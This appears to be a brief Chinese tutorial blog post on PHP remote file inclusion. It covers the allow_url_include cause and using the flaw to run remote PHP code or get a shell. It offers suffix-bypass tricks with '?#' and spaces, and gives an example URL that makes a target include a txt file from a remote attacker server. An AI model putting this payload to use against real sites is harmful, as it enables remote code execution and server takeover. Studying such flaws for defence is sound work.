php远程文件包含

2021/10/14 9:14:21

本文主要是介绍php远程文件包含,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

产生原因

PHP的配置选项allow_url_include为ON,则include/require函数可以加载远程文件

一般用途

远程包含含有php代码的txt文件,服务器进行解析后执行相关操作收集信息或getshell
当进行有限制的远程文件包含漏洞时,例如包含文件同时在文件名后加后缀html,则可以用?#和空格等绕过(fuzz大法好)

利用

http://127.0.0.1/index.php?page=http://远程服务器ip/2.txt



这篇关于php远程文件包含的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程